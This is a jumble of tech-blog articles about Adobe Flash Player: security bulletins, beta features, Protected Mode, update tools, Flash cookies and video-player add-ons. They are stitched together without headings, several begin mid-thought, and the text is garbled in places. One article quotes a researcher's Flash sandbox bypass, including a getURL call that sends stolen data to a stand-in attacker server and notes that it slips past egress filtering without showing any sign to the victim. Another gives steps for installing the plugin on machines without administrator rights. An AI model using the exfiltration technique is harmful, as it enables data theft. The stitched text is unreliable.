Changes have been introduced, but only in select browsers at this point of time. Google Chrome for instance uses sandboxing technology and automatic updates to keep users secure. The global updater that other web browsers use on the other hand is not nearly as thorough when it comes to downloading and applying updates as soon as they get released.

Adobe today has released a new Flash preview version for the Windows operating system that contains a new feature for the Firefox web browser.

Flash Player Protected Mode aims to limit the impact of Flash based attacks in Firefox on Windows systems. The new Flash Player feature is compatible with Firefox 4.0+ on Windows Vista or higher. Only a 32-bit version of the Flash Player release is available for download.

The security mode is automatically enabled when users view Flash Player files in the Firefox web browser. Flash contents are executed in a restricted environment that prevents attacks from reaching the operating system or other applications. It is basically a sandbox comparable with Google Chrome’s sandboxing technology, Protected Mode in Adobe Reader, and Protected View in Office 2010.

Firefox users running the new version will notice that two processes are started whenever Flash contents are accessed in the web browser with Protected Mode enabled.

Adobe notes that these are the “broker and sandbox” processes which only run if Protected Mode is enabled. These are child processes of the plugin-container.exe process if enabled in the browser. Plugin-Container adds crash protection to the browser.

The Flash Player Protected Mode version for the Firefox browser has known issues. On 64-bit Windows systems for instance, a right-click on Flash contents causes Firefox to hang. Here is the list of known issues.

• Flash Access support is not enabled in this build.
• Secure Sockets are not working in this build. (3101130)
  Open and Save dialogs can hang in Windowless Mode (3096944)
• Camera streams fail to play back when encoded with the H.264/AVC codecs (3096918)
• On 64-bit Windows, Right-Clicking Flash Content cases Firefox to hang (3096953)
• Custom context menus and clipboard copy does not work (3096977)
• Local Security Dialogs are not displayed (3096714)
  When printing to “Microsoft XPS Document Writer”, the “Save File As” dialog is always minimized (3096958)
  Some Stage3D content may cause Adobe Flash Player to exit silently (#3049089)
• Closing a SecureSocket connection may block Adobe Flash Player execution and result in timeout (#3045631)
• Camera fails to play back when camera stream is being encoded with H264/AVC codec (#3049298)
• IME may not be active in Windows Vista at times between browser sessions (#3055127)
• In SandBox Stand-Alone Player, some menu items in the Microsoft IME language bar do not respond to mouse clicks (2947549)
• Some Windows function keys such as F5 may prevent the Japanese IME candidate box to pop up (#3055096

Adventurous Firefox users find the Flash Player Incubator preview release over at Adobe Labs.

A final release version of the new Flash plugin version moves the Firefox browser security wise closer to Google Chrome.

The auto-updater is only provided for Windows systems in Flash 11.2. Windows users who install Flash Player 11.2 or later will see the following prompt after the successful installation.

It reads:

Security updates and enhancements are periodically released for Adobe Flash Player that can be downloaded and installed automatically.

Choose your update method:

• Install updates automatically when possible (recommended)
• Notify me when updates are available
• Never check for updates (not recommended)

The first option checks for and installs Flash Player versions automatically on the operating system. Depending on the Flash version installed, this may include one (Internet Explorer version or other browser version) or even both versions if both are installed on the system.

The second option will perform the same checks for new versions. Instead of installing new versions automatically it will inform the user instead.

Flash Player will check for updates once per hour if the first or second option are selected. Adobe notes that users need to restart their web browser after an update has been installed to use the new version of Flash Player in the web browser.

The latest version of Adobe Flash Player 11.2 is available on the Adobe Labs download page. The installer is provided for all 32-bit and 64-bit operating systems that support Adobe Flash. The very same page offer downloads for the Flash Player uninstaller for 32-bit and 64-bit systems to uninstall the test version from the system again.

The update checks for new Flash versions are added as a Windows task so that no update program is running all the time on the computer system. It is likely that this new security feature will decrease the number of successful Flash player based attacks on Windows significantly. (via)

You can watch both videos below:

They both certainly look impressive. Another important feature of Flash Player 11 is native 64-bit support which previously was not available at all, if you discount the Flash Player 11 Beta phase that is. The release furthermore offers theater-quality HD video and high quality HD video conferencing.

Flash Online Installation

Users of supported operating systems and browsers can install Flash online from Adobe’s website. This installer should work for everyone except Chrome users who are automatically updated to the newest Flash version whenever it is released.

Flash 11 Offline Installers

Not every user can install Flash from Adobe’s website, for instance if the computer that Flash needs to be installed on has no direct Internet connection. Some users prefer offline installers as well.

The following links point to the Flash 11 offline installers on the Adobe website. You can download those to install them on one or multiple systems.

• Microsoft Windows: Internet Explorer 32-bit, 64-bit – Web browsers 32-bit, 64-bit
• Apple Macintosh: 32-bit, 64-bit
• Linux: 32-bit, 64-bit

Adobe Air users can download and install the latest version from the Adobe website.

Interested users find announcements of the new releases both on the Flash Player Team Blog and the Flash Platform Blog which are both hosted on the Adobe website.

Both announcements link to additional pages that offer details about some of the new technologies included in Flash Player 11 and Adobe Air 3.

You can check which version of Adobe Flash you have installed by visiting Adobe’s About page on their website. (via)

According to Adobe, attackers could use the vulnerabilities to exploit a crash to potentially take control of the attacked system. At least one of the vulnerabilities has already been detected in recent attacks, which makes the update mandatory and important on all systems. The attack is carried out over email, but Adobe points out that it can also be carried out on any website on the Internet.

The attacker basically tries to convince the user to click on a specifically prepared link to execute the attack on the user’s local computer system.

Adobe obviously recommends to update Adobe Flash Player as soon as possible to the latest version that fixes the discovered security issues.

Adobe Flash users can check their version of Adobe Flash Player on the about page over at Adobe.

Google Chrome users are the only ones who do not have to manually update Flash Player, as it is done automatically by Google Update.

Everyone else can download the most recent version of Adobe Flash Player from Adobe’s Download Center. Please note that you need to close your web browser during the installation process. Make sure that you uncheck the “Yes, install Google Chrome – optional” box on the download page unless you want to install Google Chrome as well.

You can alternatively download offline installers from the following links: for Microsoft’s Internet Explorer here, for Firefox, Opera and other browsers here.

You can access the changelog here. It lists all previous changes in Flash Player 10.3 and known issues among other things.

All security issues have received the maximum severity rating of critical, with the exception of the one for RoboHelp which received one of important instead.

The Flash Player update fixes several critical vulnerabilities in all Adobe Flash Player versions for Windows, Macintosh, Linux, Solaris and Android. Versions that are affected by the vulnerability are Flash Player 1.0.3.181.36 and earlier on all supported systems (Android 10.3.185.25 and earlier).

A successful exploit of a vulnerability could cause a crash and the successful taking control of the system in the process.

Adobe recommends that all users update Adobe Flash Player as soon as possible to protect their operating system and data from exploits.

The latest version of Adobe Flash Player can be downloaded from Adobe’s Download Center or in the case of Android from the Android Marketplace.

Windows users can furthermore use the Flash Player Settings Manager that is part of the Windows Control Panel to check for updates. Here it is furthermore possible to check the Flash Player version that is installed on the system. The path is Control Panel > Flash Player (32-bit) > Advanced. Users with a 64-bit version of Flash Player installed need to change the 32-bit to 64-bit in the path.

Additional information about the Flash Player vulnerabilities are available on Adobe’s security bulletin page.

Google Chrome users, who do not have Flash installed separately, have received an update by now that has updated their internal version of Flash to the latest version.

Happy updating everyone.

Probably the biggest new feature in the beta is native 64-bit support for 64-bit Windows operating systems. While still in beta, it marks a milestone in the 64-bit development of Flash, as the beta release indicates that 64-bit support might be added to the final version of Flash 11.

Users with the intention to download the 64-bit version of Flash beta need to know that it can only be run in a 64-bit web browser. That’s Internet Explorer mostly, and some custom compiled versions of the Firefox web browser. Users who run a 64-bit browser can install the 64-bit version of Flash normally on their system, provided that it is a 64-bit operating system as well. To sum it up: You need a 64-bit OS, a 64-bit web browser to install the 64-bit version of Flash 11 Beta.

What else is new in Flash 11? Adobe lists the following features on the Adobe Labs page: Stage3D APIs, G.711 audio compression for telephone, H264/AVC SW Encoding, Socket Progress Events and HD Surround Sound.

Adobe® Flash® Player 11 desktop beta drives innovation for rich, engaging digital experiences with new features for cross-platform browser-based viewing of expressive rich internet applications, content, and videos across devices. Some of the features from the Flash Player Incubator, such as Stage 3D and 64-bit support, have been moved into this beta release.

While useful to some users, they might not be relevant for the majority of Flash users at this point in time. Flash 11 Beta could be more interesting to developers who may have plans to integrate one or some of the new features into their applications.

Interested users can download 32-bit and 64-bit editions of Flash 11 Beta from the Adobe website. The new version is available for Windows, Linux and Macintosh computer systems. The download page links to 32bit and 64bit Flahs uninstallers, for users who need to go back to version 10 of Flash.

Adobe, the company behind popular technologies such as Flash Player, Shockwave or Adobe Reader released five security bulletins on the same day after teaming up with Microsoft to coordinate security releases.. Of the five, three may be affecting end users as they address vulnerabilities in Adobe Reader and Acrobat, Shockwave Player and Flash Player. All three have received a maximum severity rating of critical, the highest possible rating.

The bulletin APSB11-16 describes a critical vulnerability in Adobe Reader X 10.0.3 and earlier on Windows, and Adobe Reader X 10.0.3 and earlier on Macintosh, as well as earlier versions of Adobe Reader 9 and 8, and Adobe Acrobat 9 and 8. The vulnerability could be exploited by attackers to crash the application to take control of the computer system Adobe Reader X is running on.

Adobe recommends to update the software product to the latest available version. For Adobe Reader X that would mean to update to version 10.1, for users of Adobe Reader 9.4.4 and earlier to update to version 9.4.5.

Adobe Reader and Acrobat users can check for updates in the program interface. This is done via Help > Check for Updates. Updates can also be downloaded from the following locations.

• Adobe Reader Windows
• Adobe Reader Macintosh

You can also check out Adobe Reader X Offline Installers

Security Bulletin APSB11-17 describes vulnerabilities in Adobe Shockwave Player 11.5.9.620 and earlier on the Windows and Macintosh platform. Attackers who successfully exploit the vulnerabilities could run malicious code on the computer system. Adobe recommends to update Shockwave Player to version 11.6.0.626 to protect the system from possible exploits.

Windows and Mac users who run Shockwave Player on their system can download the latest version at the official download site.

Bulletin APSB11-18 finally describes a vulnerability in Adobe Flash Player that affects Adobe Flash Player 10.3.181.23 and earlier on Windows, Macintosh, Linux and Solaris, as well as Flash Player 10.3.185.23 and earlier for Android.

The vulnerability could be exploited to cause a crash which could allow the attacker to gain control over the affected system. Adobe has confirmed reports that the vulnerability is exploited in the wild in the form of targeted attacks on specifically prepared websites.

Adobe recommends to update Flash Player to Adobe Flash Player 10.3.181.26 on desktop operating systems. Android users will receive a patch before week’s end.

Users can verify their installed version of Flash Player by visiting the About Flash Player page at Adobe.

Adobe lists the latest version for all supported operating systems on the page, so that users only need to compare their installed version with the latest available version to see if they need to update.

The latest versions can be downloaded from Adobe’s Flash Player Download Center. Users who do not want to use the download manager can check out this guide Download Adobe Flash Without Adobe Download Manager.

Google Chrome users can check for updates in Chrome to get the latest version. This is done by clicking on the wrench icon and selecting About Google Chrome.

The update is classified as important which is the second highest severity rating available.

Flash users can verify the installed version of the application by visiting Adobe’s Flash Player page. The system is vulnerable to the attacks if the Flash version is 10.3.181.16 or earlier.

Download links are provided on the security bulletin’s page. The latest version can be downloaded from the official Get Flash Player page as well. Direct Downloads are available as well.

Adobe is currently not aware of attacks that use the authplay.dll component that ships with Adobe Reader and Acrobat. While the company is not aware of attacks at this point in time, it has not completed the investigation if authplay.dll is vulnerable to the recently discovered Flash vulnerability.

In other news: The developers of the popular video player VLC have also released a new version of their application to protect users from recently discovered security issues.

The release notes list an integer overflow vulnerability in xspf demuxer as well as several updates and rewrites of features in the latest version of the media player.

VLC users are encouraged to download and install the latest version of the player right away to protect their system from possible exploits.

Downloads are as usually offered at the official Videolan website.

The vulnerability, according to Adobe’s information could be exploited to cause a crash on the user system that could allow the attacker to take control of the operating system. Reports that the vulnerability is actively exploited by embedding specifically prepared Flash files in Word and Excel documents have been confirmed by Adobe.

There are reports that this vulnerability is being exploited in the wild in targeted attacks via a malicious Web page, or a Flash (.swf) file embedded in a Microsoft Word (.doc) or Microsoft Excel (.xls) file delivered as an email attachment, targeting the Windows platform

Google Chrome users do not need to update Adobe Flash unless they have Flash installed separately on their system as well. This can for instance be the case if other web browsers are used or installed on the system as well.

The easiest way to find out if your Flash Player is up to date is to visit the About Flash page over at Adobe. The currently installed version and the latest version are displayed on that page.

Downloads are provided at the Flash Player Download page which automatically displays the correct download for the browser used to open the web page, or by manually downloading the Flash Player updates from the Flash Player Support Center.

Flash Player versions affected by the vulnerability are the following:

Adobe Flash Player 10.2.153.1 and earlier versions for Windows, Macintosh, Linux, and Solaris operating systems
Adobe Flash Player 10.2.154.25 and earlier versions for Chrome users
Adobe Flash Player 10.2.156.12 and earlier for Android
Adobe AIR 2.6.19120 and earlier versions for Windows, Macintosh and Linux

The now released update of Adobe Flash Player is version 10.2.159.1 on all supported operating systems, and 10.2.154.27 if the Flash version of the Google Chrome browser is checked.

Affected are more or less all Flash users. This includes Flash installations on Windows, Mac and Linux, the built-in Flash Player of the Google Chrome browser, Flash on Android and Flash in Adobe Reader and Acrobat.

• Flash Player 10.2.153.1 and earlier versions on Windows, Mac, Linux, Solaris
• Adobe Flash Player 10.2.154.25 and earlier for Chrome
• Adobe Flash Player 10.2.156.12 and earlier versions for Android
• Adobe Reader and Acrobat X (10.0.2) and earlier 10.x and 9.x versions for Windows and Macintosh operating systems

Adobe confirmed reports that the vulnerability is actively exploited. The vulnerability uses embedded Flash files in Microsoft Word documents to exploit the issue. According to Adobe’s information those are delivered as email attachments and targeting the Windows platform.

Adobe Reader and Acrobat do not appear to be targeted right now. Adobe Reader X users are protected from this exploit by the program’s Protected Mode.

Adobe is currently finalizing a schedule for delivering updates for all affected versions of Flash Player except for Adobe Reader X which will receive the update on the next quarterly security update on June 14, 2011.

How can users protect their system from these kind of attacks? You should be cautious when you receive document attachments, especially if they come from unknown senders. Probably the best option in this case is to save those attachments to the computer, and open them in an online viewer such as Google Docs.

You could alternatively use a third party document viewer that does not support Flash, but the safest bet is an online viewer.

Interested users find additional information about the newly discovered Flash vulnerability at the Adobe Security Bulletin.

So what’s the alternative? When available, use WebM or another plugin that supports streaming video. If not? One option would be to download the video to the local computer to watch it in a desktop media player.

That’s what the Firefox add-on FlashVideoReplacer does. Well, not completely, it offers much more than that. The extension basically replaces the Flash video player on the video site with an alternative, or sends the web video directly to a compatible desktop media player.

The available alternatives depends largely on the operating system, the desktop media players and the media plugins that are installed on the system.

The developer’s website offers compatibility information. Linux users for instance will see best results with the gecko-mediaplayer plugin and standalone players like SMPlayer, MPlayer or Totem. Windows users with the Quicktime plugin, Microsoft’s Windows Media Player Firefox plugin and the standalone players SMPlayer, Windows Media Player or KMPlayer. Mac users, well, they can try to use the Quicktime plugin, but there is no support for desktop media players on that operating system.

Flash may or may not be needed depending on the plugin used. The Media Player plugin for Firefox for instance requires Flash, while Quicktime does not. Standalone players do not require Flash at all. This in theory makes it possible to disable or uninstall Flash without losing video playback capabilities on supported sites.

The standard Flash player video interface is replaced by the Firefox add-on. It now displays options to play the video on the site with the help of another media player plugin, or to send it to one of the configured desktop media players if the standalone option is selected.

The extension can be configured to automatically switch to another video plugin so that videos start to play right away. The configuration options are different for each replacement option. They usually include the selection of a video player alternative, quality settings, site support and the selection of a download folder.

FlashVideoReplacer detects installed media players automatically, with the option to point the extension to a custom player on the computer’s hard drive, good for video players that were not detected during scan or players that are not installed but available.

The Firefox add-on worked well on supported sites like Youtube or Vimeo. Several popular sites are on the other hand not compatible with the add-on, Gametrailers and Dailymotion for instance. The add-on supports downloading of videos from popular websites. It is for instance possible to download Youtube videos. The download capabilities fall short on a lot of other sites though. It is more of a nice to have than an actual replacement for the excellent Video Download Helper add-on.

The idea to replace Flash player is great, and it works well for users who only watch videos on supported sites. It is great to watch Youtube videos on a standalone desktop player without even thinking of installing or using Adobe Flash on the computer. It is however not a complete solution, at least not yet, as it is not working on all video websites.

Firefox users who want to give this a try can download the Flash Video Replacer add-on from the official Mozilla Firefox add-on repository.

Update: Flash Video Replacer has been removed from the Mozilla Add-ons. repository. An alternative is Media Player Connectivity which redirects videos to external players.

Adobe has confirmed reports that the vulnerability is actively exploited via swf files that are embedded in Microsoft Excel files that are delivered via email attachments. A successful exploit causes a crash of the application and could give an attacker control over the computer system.

A security fix is in the final stages of development, and Adobe estimates that it can be distributed during the next week. Computer users for now should be very cautious when they receive emails with Excel attachments, especially if the sender is unknown. It may be a good idea to open the documents online, for instance via Google Docs instead of a desktop client to block potential attacks.

Protected Mode of Adobe Reader X mitigates the issue according to Adobe, so that the security fix for that version will be delivered with the quarterly security update that is scheduled for June 14.

In short:

• All Flash Player versions 10 are affected for all supported desktop and mobile operating systems.
• All versions of Adobe Reader and Acrobat X, 10 and 9 are affected
• The vulnerability is exploited via Excel email attachments that have a Flash file embedded.
• A patch will be delivered in the next week

Additional information are available at the Security Advisory over at Adobe’s website.

Adobe Flash’s dominant position lately has become under attack by new emerging technologies. The rise of HTML5, and supported technologies, could seriously impact the dominance of Flash in coming years.

Adobe as a response has increased their efforts to improve the Flash Player. The latest development version, Adobe Flash Player 10.3 Beta, has been made available recently for all supported operating systems.

Flash Player 10.3 Beta introduces several new features, of which at least two have been requested by privacy conscious users for a very long time.

Adobe’s introductory page lists the following new features of Flash Player 10.3:

• Media Measurement
• Acoustic Echo Cancellation
• Integration with browser privacy control for local storage
• Native Control Panel
• Auto-Update Notification for Mac OS

The most interesting new feature from a privacy and security standpoint is called “integration with browser privacy control for local storage”.

Web browsers up until now did not have an option to delete local Flash storage, commonly referred to as Flash cookies. Users either had to use Adobe’s inflexible online control panel, third party software or manual options to remove Flash data from the system (see Four Options To Deal With Flash Cookies).

Adobe started to integrate access to local storage, or more precisely the ability to clear local storage, directly in the web browser with the latest beta release of Flash. The release notes state that it will be available first in Mozilla Firefox 4 and Internet Explorer 8, and at a later point in time released for Apple Safari and Google Chrome. The document does not mention the Opera web browser at all.

The current beta version does not seem to add the controls to the web browsers yet. A test with the latest Firefox 4 Minefield release revealed no new options. Adobe states that the integration with Internet Explorer is not available yet as well, but will be enabled in a future beta update.

The feature itself improves the privacy of the user. That’s great. It is not so great that Adobe does not seem to have it included at all in the first beta version of the browser.

The Native Control Panel is the second addition for Windows, Mac and Linux; It improves the management of Flash settings on those operating systems. Flash Player 10.3 will add controls to manage privacy, security and storage settings directly in the control panels of the operating systems. That feature however is not enabled in the beta as well.

Media Measurement provides integration of video analytics into Flash which gives companies and producers information about the audience and video distribution.

Acoustic Echo Cancellation gives developers additional options at hand to improve peer-to-peer communication with Flash Player. New features include noise suppression, voice activity detection, acoustic echo cancellation and automatic compensation for microphone input levels.

Verdict

The new Flash Player features look might fine on paper, but since half of them are developer features that need to be added to flash contents, and the other half features that are not enabled yet, it makes little sense for end users to download and install Flash Player 10.3 beta.

If you do not want to wait, you find downloads for all Flash Player 10.3 beta releases at Adobe Labs.

Update: The Flash Player Settings Manager appeared in the Control Panel after uninstalling and installing the latest Flash Player beta and restarting the Pc.

The applet Flash Player (32-bit) consists of the four tabs Storage, Camera and Mic, Playback and Advanced. Take a look at the screenshots below for a first impression of the feature.

The storage settings can be configured in the Storage tab. Here it is possible to allow or block all sites, or configure Adobe Flash to always ask when a site wants to save information on the computer. The button Locale Storage Settings by Site opens a new window that lists all websites and servers that are storing data on the PC. Options available there are to delete individual entries and to change the permissions of the host. The Delete all button in the main interface deletes all data that is currently stored on the system.

Camera and Mic allows to block all sites from using the camera and microphone or configure Flash Player to ask whenever a site wants to access the devices. The Camera and Microphone Settings by Site button opens a new window to allow or block access from specific sites.

Peer-assisted networking is configured under Playback. Here it is possible to block all sites from using peer-assisted networking. The default setting displays a confirmation dialog whenever a site wants to make use of the technology. It is again possible to configure rules for specific sites with a click on the Peer-assisted Networking Settings by Site button.

The advanced settings finally display a Delete All button to delete all local storage, saved choices, settings and other data used by content in Flash Player across all browsers on the computer. It is possible to change the update settings from automatic updates to never check for updates. The Check Now button can be used to check for updates manually.

The two remaining options are to specify trusted location settings for developer testing, and to deauthorize the computer which prevents Flash from playing previously viewed protected contents.

Adobe has placed several web links in the control panel applet that open documentation pages. Follow this link to open the start page of the Native Control Panel documentation.

He found out that SWFs that are loaded from a local file can in fact bypass the sandbox by passing “the contents to the attacker server via getURL() and a url like: file://..”. That however can only be used to pass IPs and hostnames and no other data.

Data can however be send to a remote server on the Internet as well. A solution was quickly discovered; Adobe is blacklisting protocol handlers (via) which means that Flash Player will block some protocols (like JavaScript://) while allowing others (like mailto://). While it is theoretically possible to bypass the blacklist, an even easier solution is to find a protocol that is currently not included in the list.

Billy Rios found the mhtml protocol:

There are a large number of protocol handlers that meet the criteria outlined in the previous sentence, but we’ll use the mhtml protocol handler as an example. The mhtml protocol handler is available on modern Windows systems, can be used without any prompts, and is not blacklisted by Flash. Using the mhtml protocol handler, it’s easy to bypass the Flash sandbox:

getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);

Some other benefits for using the mhtml protocol handler are:

The request goes over http/https and port 80/443 so it will get past most egress filtering
If the request results in a 404, it will silently fail. The data will still be transmitted to the attackers server, but the victim will never see an indication of the transfer
The protocol handler is available by default on Win7 and will launch with no protocol handler warning

Attackers need to create a Flash file that they add the mhtml request to. Users then would need to execute the file on their computer system. How does it get there? For instance by email or as part of a virus attack. (via)

You can get more information about Flash Cookies in a guide we have posted a few years ago. Adobe has now announced that they have plans to “LSO management with the browser UI” which would mean that users would be able to delete those cookies just like they are able to delete regular cookies.

Most recently, we’ve been collaborating with browser vendors to integrate LSO management with the browser UI. The first capability, one that we believe will have the greatest immediate impact, is to allow users to clear LSOs (and any local storage, such as that of HTML5 and other plugin technologies) from the browser settings interface—similar to how users can clear their browser cookies today. Representatives from several key companies, including Adobe, Mozilla and Google have been working together to define a new browser API (NPAPI ClearSiteData) for clearing local data, which was approved for implementation on January 5, 2011. Any browser that implements the API will be able to clear local storage for any plugin that also implements the API.

Adobe basically has created a new browser api which can be used by the browser to clear the local storage. This throws the ball to the browser developers who now need to evaluate if and how they can implement this new option in their browser.

Another interesting change is that Adobe wants to integrate Flash Player Settings Manager directly “Control Panels or System Preferences on Windows, Mac and Linux”. While that’s hopefully optional it will give users a direct easier way of accessing those settings.

The first browser to roll out with the new feature will be Google Chrome dev which may offer the feature in a few weeks.

Interested users find the full blog post over at the Adobe Blog.

The main purpose of DivX HiQ according to the developer page is to improve the video quality on sites like Youtube. I’m not sure about the quality improvement, it was not really noticeably for me. The new player reduced the cpu usage while playing videos by about 50% on a fairly fast computer system. Some users reported drops from a very taxing 90-100% down to 20-30%.

The DivX HiQ browser add-on displays a bar directly beneath videos on supported websites.

A click on the play button reloads the page and replaces the video player with the DivX HiQ player. The player offers similar controls than the standard player. Available resolutions are displayed and a click switches between them.

The player is an option for users who experience cpu usage spikes during video playback. Firefox users will notice that they cannot uninstall the add-on from within the web browser. It can only be disabled in the add-on manager. The only option to uninstall it is to uninstall DivX HiQ on the system which would mean that it is not available in other browsers as well. (see Why Do They Think It Is OK Response for a discussion of that problem in the Firefox browser.)

Google Chrome users on the other hand can uninstall the installed extensions just fine. Computer users who want to try out the DivX HiQ software can download it from the DivX Labs website.

One of the biggest addition in Adobe Flash Player 10.2 is improved hardware acceleration. This version “enables access to hardware acceleration on the entire video pipeline” which should reduce the processing power requirements noticeably during video playback. Adobe mentions that they have seen “laptops play smooth 1080p HD video with just over 0% CPU usage” during tests. While that does not necessarily mean that every computer sees such a huge drop in cpu usage it does give a good indication of what users can expect after installing Adobe Flash Player 10.2.

The new version of Flash Player can be especially helpful for users who have experienced slow downs or high cpu usage during video playback.

Flash Player 10.2 introduces Internet Explorer 9 GPU support which can improve the rendering performance in Microsoft’s newest Internet browser by up to 35%.

Computer users with multi-monitor systems will like the ability to play full screen Flash contents on one monitor while “multi-tasking” on the other.

It still has to be noted that the release is a beta version and not a final release. Users who want to try it out can download Flash Player 10.2 beta from Adobe Labs. It is available for all supported operating systems.

That was kinda strange since I did not make any changes to the browser itself or the Flash settings. Still, I opened Tools > Google Chrome Options > Under The Hood > Content Settings > Cookies > Adobe Flash Player storage settings to see if third-party Flash contents were indeed disabled.

Allow Third-Party Flash Content To Store Data On Your Computer is an option under the Global Storage Settings in the Flash Player settings manager (that’s the second icon from the left).

The setting was disabled. I tried to enable the setting but the checkmark did not appear after a click. I was able to change the slider to set the storage maximum, but when I switched tabs shortly to see if the setting was saved I realized that it was not.

Big problem. I figured that it may be a problem of creating a directory on the local PC. The browser may need elevated privileges for that. I decided to give it a shot, closed the Chrome browser and restarted it as an administrator. Followed the path again to the Global Storage settings panel and lo and behold, Allow Third-Party Flash Content To Store Data On Your Computer was enabled again.

I’m still not sure what caused the problem in first place, but if you run into problems playing Flash videos on the web you may want to check the third-party Flash content settings to make sure they are enabled.

Flash Player informs the user about updates automatically, and one could say that this should be enough to update the browser plugin regularly. The default interval for update checks however is set to seven days which means that users may be notified about a Flash Player update up to seven days after it has been released.

In addition, users can opt out of update notifications which essentially means that they will not receive information about Flash Player updates anymore.

Both settings can be configured in the Global Notifications Panel of Flash Player’s online configuration settings. The only browser that updates Flash automatically whenever it is released is the Google Chrome browser, but only if the native Flash plugin is used.

Alternative Flash Player Auto-Updater is a third party tool that detects the installed Flash version on the system, checks for Flash Player version updates online and offers to install updates if available automatically.

The program displays the installed Flash Player versions for Microsoft Internet Explorer, and the web browsers Firefox, Safari and Opera, as well as the latest known version on startup. It will automatically inform the user if a new Flash Player version is available. It will do that by default even if Flash Player is not installed on the system. If the user accepts the new version is downloaded and installed on the system.

The software needs to be run with administrative privileges for that. The program settings offer options to ignore Flash Player for Internet Explorer or the other browsers, which is helpful if a user does not want to install Flash Player in one of the browsers. It is furthermore possible to enable a silent install of Flash Player updates, keep the latest installers on the local system and add the program to Windows startup.

Alternative Flash Player Auto-Updater is a comfortable program to quickly check for Flash Player updates. It needs to be started regularly however which some users may not like.

Alternative Flash Player Auto-Updater Download, Compatibility

The latest version of the software is available at the developer website over at Wecode.biz. It is compatible with most 32-bit and 64-bit editions of Windows, including Windows XP, Vista and Windows 7.

Adobe’s Flash Player needs elevated rights during installation, if the user has only standard rights it cannot be installed; At least not the standard way.

Lets assume you have access rights to use a computer at school, work or a public place, maybe on a company laptop or at a school library. A web browser is available but the Flash plugin is not installed so that you cannot access Flash based content sites such as Youtube.

Please note that this method works perfectly fine if Firefox is the web browser used on the system. It is unlikely that Chrome or Opera are installed on the system, but workarounds exist for these browsers as well.

If you are a Firefox user and want to use Flash but do not have administrative privileges do the following:

• Download the latest version of the Firefox Flash plugin from the official Macromedia website. Your best option is to right-click the download link and select Save As.
• Extract the contents of the downloaded file to a folder on the local system. You may need to change the file extension to zip if you have only access to the standard Windows unzipper.
• Move the two files NPSWF32.dll and flashplayer.xpt into the Firefox plugin directory. The plugin directory is located in the root directory if you are using a portable version of Firefox, if Firefox is installed is is located in the profile folder. Easiest option to find out where the folder is located is to enter about:support in the address bar. This works for Firefox 3.6 and up.
• If no Plugins folder exist create the folder and move the two Flash Player files into the folder.
• You can now enjoy Flash based contents. Be aware that the plugin is not auto-updating itself. You need to make sure to keep it up to date manually.

You have a few additional options that you may want to explore. If you can run portable software, you may want to consider using Google Chrome portable, since the browser ships with the Flash Player plugin natively.

The same is true for other portable browsers. Just configure the browser at home so that it includes the Flash plugin and run it from the computer where you have limited access rights.

I’m not sure if there is a way for Internet Explorer as well. If anyone has some insights let me know in the comments.